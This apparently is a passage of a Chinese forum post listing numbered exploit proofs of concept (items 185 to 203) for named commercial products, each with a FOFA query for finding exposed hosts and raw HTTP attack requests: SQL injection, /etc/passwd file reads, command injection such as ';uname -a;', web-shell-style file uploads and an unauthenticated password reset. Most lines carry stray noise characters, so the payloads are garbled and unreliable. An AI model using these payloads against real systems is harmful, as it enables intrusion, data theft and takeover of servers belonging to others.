! q/ M$ `, I# l. p/ m5 p3 VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; |+ T% g, i7 D/ a0 ^# _X-Requested-With: XMLHttpRequest* \% {" A. `5 b$ F- }
' `# g: j6 v) \ g% q
9 v1 a7 m( |8 m7 }7 G, ^" ~
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')0 \. C* [& J% f' ]! ^3 B' b
~; L! t& h4 U* P/ n) Q2 H7 [+ h v; s x/ \5 l, q. L
185. 瑞友天翼应用虚拟化系统SQL注入( {- q/ ]8 u% M& i F
version < 7.0.5.1
& L5 ?6 d, _! |) ~- B1 {% E7 m8 ^* FFOFA:app="REALOR-天翼应用虚拟化系统"
- @- U* J& a, Y( P/ _0 l" @GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
& ?1 z1 C# O' g- L7 h! UHost: host
! |4 ~4 R$ S, B" o0 D: T7 m$ n- F" `) N* m/ s) P( v/ K" ~ ]
& ^1 s: k P; q/ O186. F-logic DataCube3 SQL注入
7 D# a% O0 j# |CVE-2024-317502 [4 C# O# a; ]8 k7 U
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统8 N" a; R& u% Y+ y2 R( N
FOFA:title=="DataCube3"* }0 T- i- O; {. U
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
0 d, a% J! v- W0 E4 D5 ?Host: your-ip A- _5 W; y4 ~& b- H4 E7 R) T& p! ~3 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0% j8 o( x1 O+ {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
`2 {/ }3 C# m. b/ Q$ eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 m: j& w9 e. Q$ l0 H% {% VAccept-Encoding: gzip, deflate
& ?6 R2 [/ R5 R- V8 X( i+ m3 {. j4 g6 nConnection: close
3 F9 [) a1 H' [" t: m7 n) \Content-Type: application/x-www-form-urlencoded
+ e5 `( e) D+ s x
8 a4 _$ s9 n- r" P9 E. x6 T" S; o/ hreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14509 o+ ] c; v! t* O6 E$ V
Z; p1 ?% R0 b6 G3 Y8 [8 S! l( L8 Q& r* Z( c( ^8 b" n
187. Mura CMS processAsyncObject SQL注入2 N z6 D6 S* a V2 T5 B8 f
CVE-2024-32640
7 t4 ~. m& d8 s( wFOFA:"Mura CMS"6 V$ P: Y+ ?& g" h
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.18 Y/ W9 @9 r( z% [$ u8 f
Host: your-ip- w* A* `" h5 U# O
Content-Type: application/x-www-form-urlencoded
2 m$ b9 t7 v9 J' M1 p' o& ]) |' Q( D1 {# F, i( l `4 \1 s
% z% V: x4 b, j
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
7 d" n h: s2 J# L: V( Y/ Q- S
( _( }5 [9 p" [1 v& g! A4 u5 B
7 J2 K% n ]1 f6 i188. 叁体-佳会视频会议 attachment 任意文件读取: j' k! M8 G4 d3 ?9 I0 e
version <= 3.9.7
) O) X4 \( l* TFOFA:body="/system/get_rtc_user_defined_info?site_id" {8 A/ F4 g V f
GET /attachment?file=/etc/passwd HTTP/1.1
. d F0 p/ T- b) nHost: your-ip( j: R* y- J6 D! M. v5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# [+ o% p' R, L2 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" Z/ s) i# n0 q
Accept-Encoding: gzip, deflate
, X$ D0 h9 G. iAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
; ^% [) m' ]; e! J; T Q" R8 ZConnection: close/ d2 H# r( D: w9 e% ~
7 d2 T( b; A+ I+ y( {) D
+ i% e( _4 p! {0 M1 x4 l2 d5 k
189. 蓝网科技临床浏览系统 deleteStudy SQL注入7 A6 A; n" v" o, }' E4 a4 V! e
FOFA:app="LANWON-临床浏览系统"$ q/ c2 m; O4 j3 T. P- o
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.10 }0 e' F; {5 \6 w4 p+ M2 O
Host: your-ip7 O! c; y, J1 L; c' E: N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 N" z1 b2 y$ R0 Y. V; ?0 d+ \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 v( A, U/ u0 g2 mAccept-Encoding: gzip, deflate
1 F% v8 n1 n# k% h' q: zAccept-Language: zh-CN,zh;q=0.92 W+ X9 y9 }( h% L. ^/ M
Connection: close% _, Y$ c% x: Z
9 g" r! u( V' D& D+ u& a" h
4 t, W) ~6 V* J' e/ j9 B6 B
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
5 s! i5 R S# T. [( EFOFA:title=="短视频矩阵营销系统"1 c. t; P( S" R7 k
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
8 |. C, ~( U8 R1 D& ?Host: your-ip" [! R/ u2 }4 O; X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36. y6 H6 b& I' i
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 C7 l6 h; ]3 T' E& r1 ]) h! e2 u
Content-Type: application/x-www-form-urlencoded
1 ?0 j6 A4 m5 S) x% ^! kAccept-Encoding: gzip, deflate
- r5 L0 f5 A6 N! j$ f* N2 n# kAccept-Language: zh-CN,zh;q=0.98 }* t+ O6 d& Q& j3 G3 x3 e% O
/ a$ }, W4 r0 A0 L5 z
poi=file:///etc/passwd
7 M; R- u$ E5 {6 j a3 p+ H0 R6 P& O5 W% h* ?- W5 ?/ f
7 ]" f m& \; [! j: l7 q
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
" }$ @- H' w* |8 f8 SFOFA:body="/CDGServer3/index.jsp"8 w; E/ F `- x; b- h
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
9 }$ j7 v+ z9 J6 {5 f8 cHost: your-ip' Y8 Z: G" d6 ?9 Z8 f4 s' x! |: v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) d J" p+ J, f7 ~# o$ U
Content-Type: application/x-www-form-urlencoded
9 U6 L9 [4 o, A0 A9 f; ~2 n" g0 y. i. ?# w9 F& a8 G2 Y$ a
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=. n- K$ J0 F- m6 f9 a
. r A, Z! o2 Y
# c5 {( ?# ^3 p. U8 s0 Q* R
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
0 s8 F! A6 e7 s [: lFOFA:title="用户登录_富通天下外贸ERP". j2 F. y- o) x' q/ J
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.10 E, B3 w+ X3 V) c6 B! U0 y
Host: your-ip
% Q8 Z% \1 w' K& `9 \8 uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
4 @8 n4 H" @: A" VContent-Type: application/x-www-form-urlencoded
}1 H* p: V2 _8 }1 f0 }8 u% m8 M9 z7 R. k& G
% A4 N, e, v2 f; \( g* }( Z( z<% @ webhandler language="C#" class="AverageHandler" %>. l8 U' I7 u# ^: T$ ]" Q8 C
using System;' a% \( U, Z0 U/ M: h
using System.Web;, i% q3 X c. Z% [$ j+ s
public class AverageHandler : IHttpHandler# S$ a, k) z0 Z4 X2 m j
{
+ h! j) Y* a9 `, z4 J3 D* v. Z0 _7 ppublic bool IsReusable! y" N$ H6 C8 S$ }$ a/ Q
{ get { return true; } }* X8 h: o" r# w: I) \% t" k
public void ProcessRequest(HttpContext ctx)
8 |% B5 g |+ k) v7 D: R{' v9 R# A, n& y; I) \8 N
ctx.Response.Write("test");
1 k8 l1 I% a# ~% q# C}( M' ^+ H* e$ j% r4 w4 o2 {' j
}
. t6 z6 b* F7 G2 l+ M: ^% t8 F% D0 C1 |) B, q+ x
# D) [. u: U" J! g I193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
) f3 E2 g9 h: B' tFOFA:body="山石云鉴主机安全管理系统"
4 v; t; o1 R' x, d. a" {6 eGET /master/ajaxActions/getTokenAction.php HTTP/1.18 K( @9 Z+ d' g. g1 b. @
Host:
% ^, {7 a" R4 b6 S8 k; i& kCookie: PHPSESSID=2333333333333;
9 F4 K2 J9 U3 q3 p( R' VContent-Type: application/x-www-form-urlencoded0 ?- p! i2 v. p+ V0 F" Z; C
User-Agent: Mozilla/5.0/ M2 r* R, f6 W8 ^$ W' j. N1 S
) d1 @/ C" ?2 \0 O+ _8 S$ z% {7 D5 d7 w5 Q- b* X
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1' U- `/ x2 `/ b* a! E
Host:: {4 P# l1 _3 h
User-Agent: Mozilla/5.0
* ?( b3 s4 {) SAccept-Encoding: gzip, deflate
& P0 _$ p1 D% U) o* i3 `Accept: */*% f' q& Q4 D: u
Connection: close
/ O+ s- S. a$ d8 \Cookie: PHPSESSID=2333333333333;
/ H/ c* E3 O1 c7 ?2 xContent-Type: application/x-www-form-urlencoded
; V2 \/ }- ^. p1 pContent-Length: 844 `/ B- |# I: O# F! u4 m# s% T. G
, ]6 I0 K/ }: e& U; k! x' O
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
( W& P- G1 r! w- h# t$ O9 @: `8 x9 [/ v1 G: O
8 d1 L: u [# ]! m, i" c- [* ~" F8 X6 NGET /master/img/config HTTP/1.1
) f2 ^9 o- T. ]6 [/ QHost:' b! W; T9 Y' `. s
User-Agent: Mozilla/5.0- m3 [$ @. n4 d- Y# u& h
3 D2 |* Z7 b. |2 `0 I% \
0 o# l% O _& ]% B' q' X- C
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传* `4 ~2 h1 L7 y6 Z j; C
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在1 |/ h' H3 k2 Z- B7 C7 c
5 }- k- u$ v+ V" R& H& _
POST /servlet/uploadAttachmentServlet HTTP/1.1
3 S# C" h4 E. e t4 P/ cHost: host
" O! D$ O, T) `! mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
9 n2 Z1 H# |/ aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: g8 S9 T" D3 w& X' P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ O7 _; R: d1 }3 d6 O( z7 G8 N
Accept-Encoding: gzip, deflate
! E% b5 T! ] a) D2 rConnection: close# b/ \- a9 y9 N' m e, z3 G9 o2 A: N
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk9 E- p c2 ^" k& C; s
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ z! c( i+ c* c4 F, D% L4 m7 S+ Z& S6 `
& _/ r% t& b9 a% S [1 k* jContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"- `+ G1 g: C/ y4 p* k$ V4 W
Content-Type: text/plain' {5 h Q g- ?. h) d8 Z' ^
<% out.println("hello");%>
& y3 {5 Q5 m l" a4 a0 Q------WebKitFormBoundaryKNt0t4vBe8cX9rZk! H: H, a/ W# q, V
Content-Disposition: form-data; name="json"9 u) E7 S% `8 o1 B* t7 u3 U. e
{"iq":{"query":{"UpdateType":"mail"}}}0 x% T# e8 _4 X) ` o+ ~" E1 s1 _
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--! Q/ n( f1 L6 o3 w% u P5 S
8 d1 P4 G/ w0 I A7 n, y
* k& p% n) W2 m. O5 O2 h1 ]
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行- W& b- X* `& I) D
FOFA:title=="飞鱼星企业级智能上网行为管理系统6 @& a+ j' \9 |( M* Q5 _
POST /send_order.cgi?parameter=operation HTTP/1.1
1 ~+ R7 N H: x6 \3 T- THost: 127.0.0.1
* j" V% ]; z0 I' {. r2 ~. N) APragma: no-cache
6 `. I7 X ?( P: [+ \- x7 sCache-Control: no-cache/ i: P2 s2 n0 A5 ~. K% D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36( f- A4 ?5 A4 T/ D6 \! c
Accept: */*
5 U% B3 Z2 N2 x0 j- u( a: w# @4 W$ yAccept-Encoding: gzip, deflate
: N" \9 b3 o4 s* U- g. x, JAccept-Language: zh-CN,zh;q=0.9
$ |; a* R( c1 WConnection: close
; O. b% A# z, E; b# IContent-Type: application/x-www-form-urlencoded
; T6 B5 b# V, F# u% x" M# iContent-Length: 68. v N8 f) z6 Q! A
6 ~! O6 U! ^: k, y{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}3 d- z+ z1 K/ C$ Q) u2 k
9 w- a g; ~7 O! I' J# m
2 }* K- H4 P0 d( l8 `! l2 ?, P
196. 河南省风速科技统一认证平台密码重置
" _7 j& B U- j% l! y& HFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
+ }% V8 T6 Y9 a |: zPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
& Q4 I$ ]) U3 [# vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
7 b1 u! F/ Z$ |. C5 LContent-Type: application/json;charset=UTF-81 m; Y z# `& K8 v+ c9 f+ Q
X-Requested-With: XMLHttpRequest
1 C% B0 ~* x2 d8 a- t/ h, OHost:- z. u8 m/ {/ x" S) @
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
. C( X5 O2 x7 V- @# K0 GContent-Length: 45
9 c: P- H: e6 R4 \2 `Connection: close
$ e: ^9 i5 ^) `+ c" ]9 x3 u7 {, @2 e
{"xgh":"test","newPass":"test666","email":""}
: [9 o# }* g- r. ?. p. y& c2 g- ]7 N1 |* _6 m% C" m6 }. s
( N$ w; R* X8 _ J% r0 ^) n3 f
( n2 m# j. A* ^: x5 _. ?& D
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入: V: \- f! L. K! l
FOFA:app="浙大恩特客户资源管理系统"
* t- D9 w/ g) h& ?, B: z; x3 b8 n; NGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
) I# K( X) q1 F( `1 m- mHost:: P% t5 ?% Z+ M! o, E/ I" X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36# b3 b5 f& }6 P( k. q$ `
Accept-Encoding: gzip, deflate" A! W0 T4 |- t. W% k q) w
Connection: close( S- n9 i% H: `2 I' f' i
' j! b# G; N8 E F
$ X J& [( k9 N. T. w
& `( }" A& o3 j4 f* G2 P) i198. 阿里云盘 WebDAV 命令注入9 g& q9 s: l* E; H3 U
CVE-2024-29640
4 W7 p) v9 r: n, E- [- `GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1) E8 b% B$ P3 j7 s9 p
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf648 B" a' [7 L% {0 V, F! x
Accept: */*
$ _7 J1 r( ]" j0 d5 Z J. W8 S+ SAccept-Encoding: gzip, deflate
: V1 F' O9 e: YAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.62 F* a# `: V% H- U1 o
Connection: close
! M7 Z6 q9 P0 `0 t* C, w" R# S1 B* g
9 d8 c. r ~) n/ k; O; I7 M! p3 R$ K( L3 N6 W8 Y
199. cockpit系统assetsmanager_upload接口 文件上传
6 R5 l8 ?3 }4 x6 ?2 F x1 N* v4 {$ s5 l& {; I p% J
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
% q, f: q+ f _( t; c6 cGET /auth/login?to=/ HTTP/1.1; m: B$ ?$ E4 j3 Y. N( q
; [- F; u# N/ v# y
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
5 @5 w- \6 A8 d
" _/ x* X/ c1 [2.使用刚才上一步获取到的jwt获取cookie:0 d9 J( T6 ?- t7 x
: Y$ v* h r6 M9 f+ S7 X2 k- nPOST /auth/check HTTP/1.1
3 e( b3 F3 K) q) s' [( FContent-Type: application/json
4 ]. s5 C: J9 H% e4 i- u! a3 w+ ?! s" a( M% B' X/ ], e
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
3 \0 H3 C1 [( U# v6 [; Z( G+ x" B6 y5 d& h+ i$ |
响应:200,返回值:, c3 \7 K4 F1 Q" N: s; ~ f
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/0 R J+ p$ H+ i5 B, S" ~
Fofa:title="Authenticate Please!"8 P$ T, m7 b$ u6 ?+ A7 P- {# Z$ L
POST /assetsmanager/upload HTTP/1.13 q! Z+ O, ]8 C- A8 G7 @* y
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
( A% U2 S4 [" i# B4 {$ Y- mCookie: mysession=95524f01e238bf51bb60d77ede3bea92
7 e! S" q8 t( o
/ i+ M3 _7 K S8 G$ h1 ?. @-----------------------------36D28FBc36bd6feE7Fb3
! O- [$ E3 t+ z% FContent-Disposition: form-data; name="files[]"; filename="tttt.php"
& ^ P2 }/ ?% q8 gContent-Type: text/php1 C; |$ _/ D0 D% r9 r$ C- ~( a
& t. z8 k+ n# Y/ t, h0 `: H<?php echo "tttt";unlink(__FILE__);?>* J0 S% Q9 |* ^2 _1 R
-----------------------------36D28FBc36bd6feE7Fb3
3 e$ z3 W% Q/ T# N U7 @# NContent-Disposition: form-data; name="folder"2 _* m; D# U# M" a7 D, R3 W: Y7 J8 m& ?
8 _ ~0 J$ X& U* Q* [* x; b3 s
-----------------------------36D28FBc36bd6feE7Fb3--
5 ^" Q) R6 t% N7 }+ y7 }
# N. n0 ?9 Z4 u; s, u3 V
& T- \1 U1 ^4 y6 o: x) _/storage/uploads/tttt.php
, @1 V* X7 N% J1 h& [# j
! g5 m2 U, i0 z$ o200. SeaCMS海洋影视管理系统dmku SQL注入
3 S9 p5 ^6 T! i9 U% VFOFA:app="海洋CMS": o0 C4 t) T3 W, Q0 d
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
9 N; b+ g& I- L5 P) t) ]# h" }Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s) f" ^: S# o! Y8 K( l
Upgrade-Insecure-Requests: 1, u! F0 ]* G" }, G" P+ y
Cache-Control: max-age=0
, }! c* P2 d1 [5 L; p RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# t( J( P/ P0 H. V' ~( @4 n) FAccept-Encoding: gzip, deflate) E: Y8 L; k. y b2 I" I9 x
Accept-Language: zh-CN,zh;q=0.9/ i; k# z0 k/ X r% B& q
; N; V. H) {' g3 k E
' j( U ]3 r( M- g* _201. 方正全媒体新闻采编系统 binary SQL注入
( S+ i- A Z5 h, m' @2 dFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"7 Y) U8 e3 d/ G- c5 R3 S
POST /newsedit/newsplan/task/binary.do HTTP/1.1
6 C8 d2 v' f1 ?( F. s0 ] |4 F" CContent-Type: application/x-www-form-urlencoded2 j: n% E4 U. W4 S6 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. }9 O4 A* z9 M( w" o, s
Accept-Encoding: gzip, deflate
E* E- g3 u/ F3 r7 xAccept-Language: zh-CN,zh;q=0.9
# u1 C7 ^/ m. I/ SConnection: close/ u9 }2 d. H1 m) W! D& b
2 q! K$ U% k% x' K
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
, t. @$ i$ V2 u- _$ c& |$ P7 W; g! U! ~1 t7 z+ q
/ i% K6 j8 p. }' s; z
202. 微擎系统 AccountEdit任意文件上传
/ I9 J) C, U, q8 i' YFOFA:body="/Widgets/WidgetCollection/"
7 E- G! @7 K5 ^; Z) x9 ~获取__VIEWSTATE和__EVENTVALIDATION值* [# h: g. E$ p' D* z% L/ q
GET /User/AccountEdit.aspx HTTP/1.1
/ m" V( z4 u- }! X8 B3 k, Z' sHost: 滑板人之家& o' y- {$ {' @8 w. }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31# p7 d& f1 g# f/ d6 S
Content-Length: 0
9 E' T! d7 v* x8 @2 d" r5 @& v [1 o. i7 o( Z0 ^1 e4 D
# `+ I4 l. m3 E( n$ n! J替换__VIEWSTATE和__EVENTVALIDATION值
# u) b" u# i4 v5 p6 ?POST /User/AccountEdit.aspx HTTP/1.1
' w- n6 l X. y& HAccept-Encoding: gzip, deflate, br
; z0 p+ X% o8 ~* S! vContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
, T p# Z9 r/ u" i# H( x, X3 ^* X- O3 [2 H/ k+ y( a
-----------------------------786435874t385875938657365873465673587356879 Y0 b: e d' \0 a! }, H; z
Content-Disposition: form-data; name="__VIEWSTATE"
7 X# N! m, D8 @: l( I& k4 }9 ]8 V3 H: Q3 x7 ]* O3 p% Y
__VIEWSTATE
! p& r4 u) f" o4 ^9 a( A% a-----------------------------786435874t38587593865736587346567358735687% o* [! E; K: K+ Q6 I- N, \
Content-Disposition: form-data; name="__EVENTVALIDATION"% {% N% _7 x5 }4 T2 x! X V
/ K' R% y7 }) t5 n+ s) H__EVENTVALIDATION
. C) @8 C9 G1 L8 d( V) P-----------------------------786435874t38587593865736587346567358735687/ A9 p% Z$ n J- x
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"5 ?. Z" y( J( t4 G/ g* D- q
Content-Type: text/plain
' O) s! x; T# B3 F
/ n7 V% ~# D* T1 K3 N' a# j; ^0 Z: ?Hello World!
# r) ^8 C& t+ A-----------------------------786435874t38587593865736587346567358735687: n# @+ }- C, p4 e/ F7 `' i
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"6 O; L2 X- K* p, Q) b
: a- j7 {0 S- n5 e( k1 j+ F* u3 i上传图片
4 {1 W* x6 z+ s5 p6 r. V4 g-----------------------------786435874t38587593865736587346567358735687
$ I/ J* x% S, J `# @Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"% q0 B; v# l6 G/ W3 Y
9 u. i0 ?1 L0 G/ I4 J3 E4 I* Z
5 X* I, B+ u ~! T7 Q! B7 y4 j( W-----------------------------786435874t38587593865736587346567358735687
J$ }# c; U" H! d* t! k( eContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
! z* H7 c j1 \9 N& c! t' h' H Q9 x& f) o2 I5 y4 Y, H" f
( t) b I5 G1 R; q) S4 F-----------------------------786435874t38587593865736587346567358735687--( Z( |2 J& J: C! l$ B/ ` p
3 h8 |! x8 s# V
/ h( [) @# G+ d/_data/Uploads/1123.txt
, k- [0 A6 i2 I% ?& W! G% s& p* F
203. 红海云EHR PtFjk 文件上传7 i& q$ y& b$ @- C
FOFA:body="RedseaPlatform"
4 l# S& g6 H8 _' ?POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.11 E! ?# g6 F& S
Host: x.x.x.x
- f2 A" e, y& {* d3 U, pAccept-Encoding: gzip" F; ^' Y1 M5 n7 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, Q d# C- z& j! @8 W# Q6 f. ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys40 C) _/ i6 V4 e1 ~% ?5 @
Content-Length: 2101 V. M" f# [( O
1 s d( m$ t0 `. `7 u% b8 y------WebKitFormBoundaryt7WbDl1tXogoZys4
4 b7 Q- S8 k `) sContent-Disposition: form-data; name="fj_file"; filename="11.jsp" @ O3 [! m9 O+ d/ @
Content-Type:image/jpeg
) j& Y1 V% @5 m$ s$ M" [ S( ]& P2 |9 k9 w; A- P! C0 P
<% out.print("hello,eHR");%>$ \$ Z, I: q( {( m" J8 L# K1 D+ [5 S
------WebKitFormBoundaryt7WbDl1tXogoZys4--
0 O @7 h& N t% j9 ^
' U* O3 F" `; z9 z! B
' Z; [: y( t$ f) G# s& D$ @( L) q
- K6 G! m( r' F& c4 Z/ s2 _
; T9 j5 H: h$ w$ F1 I+ t6 h' a! C2 B" @! ^; b3 U0 M
|
发表于 2024-6-5 14:31:29
收藏
支持
反对